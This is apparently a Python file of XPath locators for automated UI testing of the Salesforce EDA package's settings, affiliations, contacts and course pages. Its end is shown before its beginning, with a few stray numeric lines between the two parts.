'slds-modal__container')]/descendant::span[text()='{}']/../following-sibling::div/descendant::span[text()='{}']/following-sibling::a[@class='deleteAction']", "toast_message": "//lightning-icon[contains(@class, 'toastIcon') and contains(@class, 'slds-icon-utility-success')]", }, "course_offering": { "search_courses": "//div/input[@title='Search Courses']", "new_button": "//a[@title='New']//div[@title='New']/..", "new_course_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Course')]", "save_button": "(//span[@class=' label bBody' and text()='Save']/ancestor::button[contains(@class, 'slds-button')])[3]", "next_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "final_save_button": "(//span[@class=' label bBody' and text()='Save'])[3]/ancestor::button", }, "settings_health_check": { "run_health_check_button": "//button[@title='{}']", "health_check_header": "//h2[contains(@class, 'header')]/span[text()='{}']", "last_run_date": "//button[@title='Run Health Check']/preceding::div[1]", "expand_button": "//button[@title='Expand these results' and contains(@aria-controls, '{}')]", "all_checks_status": "//div[text()='{}']/following-sibling::div/div[contains(@class, 'text')]", "status_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::td/preceding-sibling::th[@data-label='Status']/descendant::lightning-base-formatted-text", "recommended_fix_value": "//div[contains(@id, '{}')]/descendant::td/descendant::lightning-base-formatted-text[text()='{}']/ancestor::tr/descendant::td[@data-label='Recommended Fix']/descendant::lightning-base-formatted-text", }, "term": { "new_term_button": "//span[@class='itemLabel slds-truncate slds-show--inline-block slds-m-left--xx-small' and contains(text(), 'New Term')]//..", "save_button": "(//span[@class=' label bBody' and contains(text(), 'Save')])[5]/..", "account": "//div//input[@title='Search Accounts']", "search_terms": "//input[@title='Search Terms']", "course_offering_id": "//span[contains(text(), 'Course Offering ID')]//../following-sibling::input", }, "custom_settings": { "hierarchy_settings": "//a[text()='Hierarchy Settings']", "manage": "//span/input[@value='Manage']", "no_records": "//table//td[text()='No records to display.']", "custom_settings_frame": "//iframe[contains(@title,'Custom Settings ~ Salesforce')]", "custom_settings_definition": "//iframe[contains(@title,'Custom Setting Definition ~ Salesforce')]", "custom_settings_h_settings": "//iframe[contains(@title,'Custom Setting Hierarchy Settings ~ Salesforce')]", }, "new_account": "//span[@title='New Account']", "new_account_next_button": "//button[contains(@class, 'slds-button')]//span[@class=' label bBody' and text()='Next']", "new_account_name": "//label/span[text()='Account Name']/following-sibling::span/following::input[1]", "new_account_save_button": "//div[contains(@class, 'slds-modal__footer')]/descendant::button[@title='Save']", "account_record_type": "//span[contains(text(), '{}')]", "new_program_enrollment_save_button": "//div[contains(@class, 'inlineFooter')]/descendant::button[@title='Save']", "affiliated_accounts_count": "//span[text()='Affiliated Accounts']/following-sibling::span[contains(@title, '(1)')]", "custom_settings_title": "//a/mark[text()='{}']", "program_enrollments_count": "//span[text()='Program Enrollments']/following-sibling::span[contains(@title, '(1)')]", "programenrollment_account": "//div[@class='autocompleteWrapper slds-grow']//input[@class=' default input uiInput uiInputTextForAutocomplete uiInput--default uiInput--input uiInput uiAutocomplete uiInput--default uiInput--lookup']", "list_of_departments": "//button[contains(@class, 'slds-button slds-button--neutral')]//span[@class=' label bBody' and text()='Next']", "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "account_list": '//tbody/tr/th[.//span[contains(@class, "slds-grid")]]/descendant::a[text()="{}"]', "header_field_value": '//*[contains(@class, "slds-page-header__detail")][.//*[@title="{}"]]//*[text()="{}"]', "modal": { "checkbox": '//div[contains(@class,"uiInputCheckbox")]/label/span[text()="{}"]/../following-sibling::input[@type="checkbox"]', "save": "//div[contains(@class, 'footer') or contains(@class, 'Footer')]/descendant::button[@title='Save']", }, "accounts_contacts_settings_locators": { "copy_from": "//select[@class='contact-preferred-phone-picklist-input-select select uiInput uiInputSelect uiInput--default uiInput--select']", "disable_checked": "(//span[text()='Disable Preferred Phone enforcement']/following::div/div/div/label/input/following-sibling::span)[1]", "disable_preferred_phone": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear": "//div/span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='False']", "enhanced_preferred_clear_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "enhanced_preferred_set": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/span/img[@alt='True']", "enhanced_preferred_set_faux": "//span[text()='Enable Enhanced Preferred Phone Functionality']/following::div[1]/div/div/label/input/following::span[1]", "preferred_phone_active": "//div/span[text()='Disable Preferred Phone enforcement']/following::div[1]/div/div/label/span/img[@alt='True']", }, "relationships_settings_locators": { "sub_tab": "//div[@id='relTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", }, "contacts_locators": { "contact_save": "//div[contains(@class,'modal-footer')]//button[@title='Save']//span[text()='Save']", "header": "//a[@title='Contacts']//span", "select_contact": "//a[@title='{} {}']", "preferred_phone": "//span//span[contains(text(),'Preferred Phone')]", "preferred_phone_home_dropdown": "//span//span[contains(text(),'Preferred Phone')]/following::span/following::a", "preferred_tab": "//div[@class='select-options']/descendant::a[@title='Home Phone']", "phone_verify_has_number": "(//div//span[text()='Phone']/../following-sibling::div//span[not( text()='123-123-1234')])[1]", "preferred_error_message": "//li[contains(text(), 'The phone selected for Preferred Phone can')]", "which_preferred_error_message": "//li[contains(text(), 'Tell us which Phone is preferred.')]", "field_for_work_phone": "//div//label//span[contains(text(),'Work Phone')]/../following-sibling::input", "which_footer_cancel": "//div[contains(@class,'footer')]/button[@title='Cancel']//span[text()='Cancel']", "footer_save": "//div[contains(@class,'modal-footer')]//span[text()='Save']", "accounts_contacts": "//a[contains(text(),'Accounts and Contacts')]", "details_tab": "//div[contains(@class,'normal')]//span[@class='title' and text()='Details']", "phone_home": "//span[text()='Home Phone']/../following-sibling::input", "run_cleanup": "//button[text()='Run Cleanup']", "phone_verify": "//div//span[text()='Home Phone']/../following-sibling::div//span//span[text()='123-123-1234']", "home_phone_verify": "//span[text()='Home Phone']/../following::div//span//span[text()='123-123-1234']", "successful_run": "//span[text()='The process was queued successfully. An email will be sent at the completion of the job.']", "apex_jobs": "//a/mark[text()='{}']", "primary_business_organization": "(//span[text()='Primary Business Organization']/following::div/div/div/div/input[@title='Search Accounts'])[1]", "button_save_affiliation": "//button[@title='Save']//span[text()='Save']", "delete_icon": "//span[@class='deleteIcon']", }, "affiliations_locators": { "header": "//a[@title='EDA Settings']//span", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit": "//button[contains(@class, 'slds-button') and @type='button']/span[text()='Edit']/..", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "sub_tab": "//div[@id='afflTabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "affiliations_former": "//div/div/following::div/span[text()='Former']", "affiliations_student": "(//div/div/span[@class='uiOutputText' and text()='Role Specified for Created Affiliations']/following::div[@class='slds-col slds-size--1-of-2'])[1]/span[text()='Student']", "affiliations_current": "//div/div/following::div[@class='slds-col slds-size--1-of-2']/span[text()='Current']", "account_record_type_academic_program": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Academic Program']", "contact_primary_affl_field_primary_academic_program": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Academic Program']", "auto_enroll_academic_program": "//div/span[text()='Primary Academic Program']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enrollment_edit_mode_status_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Status: Current']/following::input)[1]", "ae_em_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "auto_enrollment_edit_mode_role_academic_program": "(//span[text()='Primary Affl Field: Primary Academic Program']/../../../following-sibling::div/following-sibling::div/div/label/span[text()='Role: Student']/following::input)[1]", "ae_em_role_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "auto_enrollment_read_mode_status_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='Current']", "auto_enrollment_read_mode_role_academic_program": "(//div/span[text()='Primary Academic Program']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='Student']", "account_record_type_business_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Business Organization']", "contact_primary_affl_field_primary_business_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Business Organization']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "ae_em_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "auto_enrollment_edit_mode_role_business_organization": "(//span[text()='Primary Affl Field: Primary Business Organization']/../../../following-sibling::div/following-sibling::div/following-sibling::div//span[text()='Role: ']/following::input)[1]", "ae_em_pbo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "auto_enrollment_read_mode_status_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "ae_enroll_bo_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "auto_enrollment_read_mode_role_business_organization": "(//div/span[text()='Primary Business Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ae_enroll_bo_status_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_educational_institution": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Educational Institution']", "contact_primary_affl_field_primary_educational_institution": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Educational Institution']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_educational_institution": "(//div/span[text()='Primary Educational Institution']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ei_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ei_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ei_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ed_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_household_account": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Household Account']", "contact_primary_affl_field_primary_household": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Household']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_household_account": "(//div/span[text()='Primary Household']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ha_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ha_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ha_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ha_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_sports_organization": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='Sports Organization']", "contact_primary_affl_field_primary_sports_organization": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Sports Organization']", "auto_enroll_sports_organization": "//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_sports_organization": "(//div/span[text()='Primary Sports Organization']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "so_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "pso_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "so_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "so_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_university_department": "//span[@class='mapping-acc-rec-type uiOutputText' and text()='University Department']", "contact_primary_affl_field_primary_department": "//span[@class='mapping-affl-field uiOutputText' and text()='Primary Department']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "auto_enrollment_read_mode_status_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-status uiOutputText' and text()='']", "auto_enrollment_read_mode_role_university_department": "(//div/span[text()='Primary Department']/../following-sibling::div/following-sibling::div/following-sibling::div)[1]/span[@class='mapping-enroll-role uiOutputText' and text()='']", "ud_art_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-acc-rec-type input']", "ud_cpaf_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-affl-field input']", "ud_aes_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-status input']", "ud_aer_em_empty": "(//div[@class='slds-tabs__content slds-show']/div[@class='slds-grid slds-wrap']/div/following::div/label/input/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div/following::div)[1]//label/following-sibling::input[@class='mapping-enroll-role input']", "account_record_type_input": "//label/span[text()='Account Record Type']/../following-sibling::input", "primary_affl_field_input": "//label/span[text()='Primary Affl Field']/../following-sibling::input", "auto_enrollment": "(//label/span[text()='Auto-Enrollment']/following::br/following::div/label/input/following-sibling::span)[1][@class='slds-checkbox--faux']", "status_mapping_field_input": "//label/span[text()='Status']/../following-sibling::input", "role_mapping_field_input": "//label/span[text()='Role']/../following-sibling::input", "acc_record_type": "//label/span[text()='Acc Record Type: {}']/following::input[1][@class='mapping-acc-rec-type input' and @type='text']", "contact_primary_affl_field": "//label/span[text()='Primary Affl Field: {}']/following::input[1][@class='mapping-affl-field input' and @type='text']", "art_ap_input_affl_empty": "(//label/span[text()='Acc Record Type: ']/following::input[1][@class='mapping-acc-rec-type input' and @type='text'])[1]", "paf_pap_input_affl_empty": "(//label/span[text()='Primary Affl Field: ']/following::input[1][@class='mapping-affl-field input' and @type='text'])[1]", } }
123.407229
692
0.674484
""" Locators for Spring '22 """ eda_lex_locators = { "app_tile": "//one-app-launcher-modal//one-app-launcher-app-tile//a[.='{}']", "app_item": "//a[@data-label='{}']", "frame": "//iframe[contains(@id, '{}') or contains(@title, '{}') or contains(@name, '{}')]", "input_placeholder": "//input[contains(@placeholder,'{}')]", "panel_tab_lookup": "//a/span[text()='{}']", "toast_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "success_message": "//div[@id='successToast']/descendant::h2[text()='{}']", "toast_close": "//div[@id='successToast']/descendant::button[contains(@class, 'slds-notify__close')]", "close_tab": "//*[@data-key='close']/ancestor::button[contains(@class, 'slds-button slds-button_icon-x-small')]", "mailing_address": "//*[contains(@placeholder,'{}')]", "record": { "actions": "//div[contains(@class, 'actionsContainer')]/descendant::a[@title='{}']", "button": "//div[@class='actionsContainer']/button[@title='{}']", "datepicker": "//div[contains(@class,'uiDatePickerGrid')]/table[@class='calGrid']//span[text()='{}']", "edit_button": '//*[@title="{}"]', "list": "//div[contains(@class,'forcePageBlockItem')]//div//div//div//span//span[contains(text(), 'Primary Address Type')]/../../div/div/div/div/a[@class='select']", "related": { "new": "//div[@class='container']/descendant::div[contains(@class, 'slds-card__header')]/header/descendant::span[text()='{}']/ancestor::header/following-sibling::div/descendant::a[@title='New']", "title": "//span[@title='{}']", }, }, "tabs": { "tab": "//div[@class='uiTabBar']/ul[@class='tabs__nav']/li[contains(@class,'uiTabItem')]/a[@class='tabHeader']/span[contains(text(), '{}')]", "spl-tab": "//div[@class='slds-tabs_default']//ul[@class='slds-tabs_default__nav']/li[contains(@class,'slds-tabs_default__item')]/a[text()= '{}']", }, "eda_setup": { "custom_settings": "//a[text()='{}']", "settings_action_button": "//input[@type='submit' and @value='{}']", "setup_owner": "//table[@class='list']/descendant::td", }, "eda_settings": { "action": "//div[@role='banner']/descendant::button[contains(@class, 'settings-{}-bttn')]", "edit": "//div[@class='slds-page-header' and @role='banner']/descendant::span[text()='Edit']/parent::button", "tab": "//div[@id='tabs']/descendant::li[contains(@class, 'slds-text-heading--label')]/a[text()='{}']", "checkbox_default": "//span[text()='{}']/../following-sibling::div/descendant::img", "checkbox": "//span[text()='{}']/../following-sibling::div/descendant::label[contains(@class,'slds-checkbox')]/span[contains(@class, 'slds-checkbox--faux')]", "save": "//div[contains(@class, 'slds-page-header')]/descendant::button[contains(@class, 'settings-save-bttn')]", "system_tab": "//a[contains(text(),'System')]", "affiliations_tab": "//a[contains(text(),'Affiliations')]", "affiliations_check": "//span[text()='Specify Role for Created Affiliations']/../following-sibling::div/div/div/label/span/img[@class = 'copy-start-date checked' and @alt='True']", "auto_enroll_business_organization": "//div/span[text()='Primary Business Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_educational_institution": "//div/span[text()='Primary Educational Institution']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_household_account": "//div/span[text()='Primary Household']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_sports_organization": "//div/span[text()='Primary Sports Organization']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "auto_enroll_university_department": "//div/span[text()='Primary Department']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll checked' and @alt='True']", "primary_affl_unchecked": "//div/span[text()='{}']/../following-sibling::div[1]//span/img[@class='mapping-auto-enroll unchecked' and @alt='False']", "checkbox_ap_affl": "(//label[@class='slds-checkbox']/input[@class='mapping-auto-enroll uiInput uiInputCheckbox uiInput--default uiInput--checkbox'])[1]/following-sibling::span[@class='slds-checkbox--faux']", "primary_affl_edit": "(//label/span[text()='Primary Affl Field: {}']/../../../following-sibling::div/div/div/label)[1]/input/following-sibling::span[@class='slds-checkbox--faux']", "affiliations_role_checkbox": "//input[@class='copy-start-date uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "affiliation_mappings_tab": "//a[contains(text(), 'Affiliation Mappings')]", "courses": "//a[contains(text(),'Courses')]", "duration": "//div[.//span[text()='Duration'] and contains(@class, 'slds-form-element') ]//select//option[@value='60']", "hh_naming_check": "//input[@class='automatic-hh-acc uiInput uiInputCheckbox uiInput--default uiInput--checkbox']/following-sibling::span", "hh_naming_role_checkbox": "//select[@class='admin-account-naming-input-select select uiInput uiInputSelect uiInput--default uiInput--select']//option[@value='{{!{{!FirstName}}}} {{!LastName}} Administrative Account']", "hh_adminfnamelname": "//input[contains(@class,'firstName')]", "course_connections_tab": "//a[contains(text(),'Course Connections')]", "cc_checkbox": "//input[contains(@class,'slds-checkbox')]/parent::label", "student_select": "//select[contains(@class,'student-course-connection-record-type-input-select')]", "faculty_select": "//select[contains(@class,'faculty-course-connection-record-type-input-select')]", "status_student_affl": "//select[contains(@class,'affiliation-role-picklist-input-select')]", "status_spec_affl_not_deleted_former": "//select[contains(@class,'affiliation-status-delete-picklist-input-select')]", "status_current_picklist_affl": "//select[contains(@class,'affiliation-status-picklist-input-select')]", "default_account_model": "//span[text()='Default Account Model']", "store_errors": "//span[text()='Store Errors']", "send_error_notifications": "//span[text()='Send Error Notifications']", "error_notification_recipients": "//span[text()='Error Notification Recipients']", "disable_error_handling": "//span[text()='Disable Error Handling']", "automatic_household_naming": "//span[text()='Automatic Household Naming']", "adminstrative_account_name_format": "//span[text()='Administrative Account Name Format']", "household_account_name_format": "//span[text()='Household Account Name Format']", "batch_processing": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td[text()='Processing'])[1]", "just_batch": "(//td/following-sibling::td[text()='Batch Apex'])[1]", "batch_watch": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "wait_frame": "//iframe[contains(@title,'Apex Jobs ~ Salesforce - Developer Edition')]", "wait_loc_text": "(//td/following-sibling::td[text()='Batch Apex']/following-sibling::td)[1]", "new_account": "//span[@title='New Account']", "affiliated_accounts": "//span[@title='Affiliated Accounts']", "affiliation_match": "//th[@data-label='Affiliation Key']/../descendant::a[@title='{}']", "edit_button": "//div[@class='slds-button-group']//span[contains(text(), 'Edit')]", "save_button": "//div[@class='slds-button-group']//span[contains(text(), 'Save')]", "administrative_account": "//div/a[text()='{} Administrative Account']", "contact_edit": "//a[@title='Edit']", "en_re_type_validation": "(//div/span[text()='Record Type Validation']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "ert_validation": "//span/img[@class='affl-record-type-enforced checked' and @alt='True']", "un_ert_validation": "//span/img[@class='affl-record-type-enforced unchecked' and @alt='False']", "delete_rec_affl": "//span/img[@class='delete-prog-enroll checked' and @alt='True']", "un_delete_rec_affl": "//span/img[@class='delete-prog-enroll unchecked' and @alt='False']", "del_rel_affl": "(//div/span[text()='Delete Related Affiliation When Deleting Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_specify_role_for_c_affl": "(//div/div/span[text()='Specify Role for Created Affiliations']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "specify_r_checkbox": "(//div/span[text()='Specify Role for Created Affiliations']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_end_date": "//span/img[@class='copy-end-date checked' and @alt='True']", "un_copy_affl_end_date": "//span/img[@class='copy-end-date unchecked' and @alt='False']", "copy_affliation_end_checkbox": "(//div/span[text()='Copy Affiliation End Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date checked' and @alt='True']", "un_copy_affl_start_date": "(//div/div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::span)[1]/img[@class='copy-start-date unchecked' and @alt='False']", "copy_affliation_start_checkbox": "(//div/span[text()='Copy Affiliation Start Date from Program Enrollment']/following::div)[1]/div/div/label/span[@class='slds-checkbox--faux']", "settings_tab": "(//li[@class='slds-tabs__item slds-text-heading--label slds-active' and @role='tab' and @title='Settings'])[1]/a[contains(text(),'Settings')]", "affl_mappings_tab": "//a[contains(text(),'Affiliation Mappings')]", "default_checkbox": "//div[text()='{}']/following-sibling::div/descendant::img", "enable_checkbox": "(//div[text()='{}']/following-sibling::div/descendant::span)[1]", "dropdown_field": "//div[text()='{}']/following-sibling::div/select", "action_button": "//button[text()='{}']", "update_checkbox": "//span[text()='{}']/../following-sibling::div[1]/descendant::span[contains(@class, 'checkbox')]", "add_setting_button": "//span[text()='{}']/../following-sibling::button/span[text()='{}']", }, "eda_settings_new": { "global_action": "//button[text()='{}']", "edc_header": "//h2[contains(@class, 'header')]/descendant::span[text()='{}']", "toast_message": "//div[contains(@class, 'slds-theme--success slds-notify--toast slds-notify slds-notify--toast 